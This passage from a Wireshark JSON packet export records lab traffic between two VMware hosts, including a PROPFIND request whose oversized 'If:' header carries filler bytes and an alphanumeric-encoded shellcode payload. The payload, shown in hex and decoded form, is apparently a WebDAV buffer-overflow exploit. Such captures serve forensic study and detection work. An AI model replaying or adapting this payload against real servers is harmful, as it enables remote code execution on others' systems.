||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "333",
|
||
"ip.id": "0x0000d26f",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00005dd4",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "33135",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "33135",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "35",
|
||
"tcp.len": "281",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "4133154645",
|
||
"tcp.nxtseq": "1730",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1771124389",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00000ce9",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:ca:d5:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:ca:d5:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868245",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000755000",
|
||
"tcp.analysis.bytes_in_flight": "1729",
|
||
"tcp.analysis.push_bytes_sent": "1729"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001718000",
|
||
"tcp.time_delta": "0.000168000"
|
||
},
|
||
"tcp.payload": "4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "144",
|
||
"tcp.segment": "145",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1729",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6a:43:77:4d:74:4f:58:41:5a:75:65:4a:6a:4d:72:50:41:59:49:71:71:68:58:43:4d:47:62:56:72:78:72:62:4b:4d:66:66:47:6e:6a:73:52:75:53:6e:47:55:56:42:56:48:57:78:65:63:57:50:43:75:54:79:70:59:44:57:55:75:6e:4f:69:6a:6d:5a:42:56:49:66:68:63:4e:54:77:65:42:41:41:55:61:78:42:52:61:50:4c:4f:41:6f:72:48:79:6d:48:6f:51:52:58:43:77:50:4a:e6:b5:86:e5:99:a4:e4:b5:b3:e5:81:b4:e6:9d:ac:e7:a9:a6:e7:9d:94:e4:91:ac:e5:81:89:e4:ad:b4:e4:91:90:e7:a1:89:e7:8d:b9:e7:a5:91:e4:b9:97:e6:a1:ac:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:85:93:e7:85:b9:e7:89:b2:e4:ad:84:e6:b1:96:e5:a9:88:e6:9d:8a:e5:91:a7:e7:a1:84:e7:8d:83:e4:ad:83:e4:b5:93:e7:99:99:e7:a9:ad:e5:81:84:e4:b5:b7:e6:8d:86:e6:b1:87:e7:81:b5:e4:bd:b3:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:4c:6d:4d:69:66:4b:5a:76:79:71:59:4e:51:69:5a:67:46:63:41:47:61:63:49:50:7a:77:71:72:4d:69:6a:41:44:5a:51:75:53:61:49:77:6f:44:4f:51:56:6f:58:6c:54:45:45:78:6b:4d:75:41:42:54:54:73:53:70:6e:69:5a:4d:4e:75:6e:70:77:61:79:4a:58:6b:6d:62:68:41:56:4f:49:7a:43:6d:43:71:69:4e:58:7a:79:56:55:43:73:4e:77:55:49:54:69:54:71:42:4c:49:6d:e6:a5:96:e6:a1:83:e4:8d:b5:e7:9d:96:e4:99:a5:e5:99:82:e4:b5:a2:e4:8d:8f:e4:85:96:e4:a1:93:e5:95:a1:e6:a9:a4:e4:a5:af:e7:89:b9:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:89:b3:e7:91:b2:e4:89:ad:e6:91:84:e1:8f:80:e6:a0:83:e4:b9:9a:e7:99:83:e4:99:aa:e4:b5:ac:e7:8d:a6:e5:9d:9a:e6:85:af:e4:b9:b4:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/jCwMtOXAZueJjMrPAYIqqhXCMGbVrxrbKMffGnjsRuSnGUVBVHWxecWPCuTypYDWUunOijmZBVIfhcNTweBAAUaxBRaPLOAorHymHoQRXCwPJ<50><4A><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/LmMifKZvyqYNQiZgFcAGacIPzwqrMijADZQuSaIwoDOQVoXlTEExkMuABTTsSpniZMNunpwayJXkmbhAVOIzCmCqiNXzyVUCsNwUITiTqBLIm<49><6D><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "147"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.448301000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.448301000",
|
||
"frame.time_delta": "0.000009000",
|
||
"frame.time_delta_displayed": "0.009829000",
|
||
"frame.time_relative": "16.699241000",
|
||
"frame.number": "155",
|
||
"frame.len": "345",
|
||
"frame.cap_len": "345",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "331",
|
||
"ip.id": "0x00000c4d",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x000023f9",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "38149",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "38149",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "36",
|
||
"tcp.len": "279",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2204680811",
|
||
"tcp.nxtseq": "1728",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "4122965157",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00001a49",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:ca:df:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:ca:df:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868255",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000453000",
|
||
"tcp.analysis.bytes_in_flight": "1727",
|
||
"tcp.analysis.push_bytes_sent": "1727"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000923000",
|
||
"tcp.time_delta": "0.000009000"
|
||
},
|
||
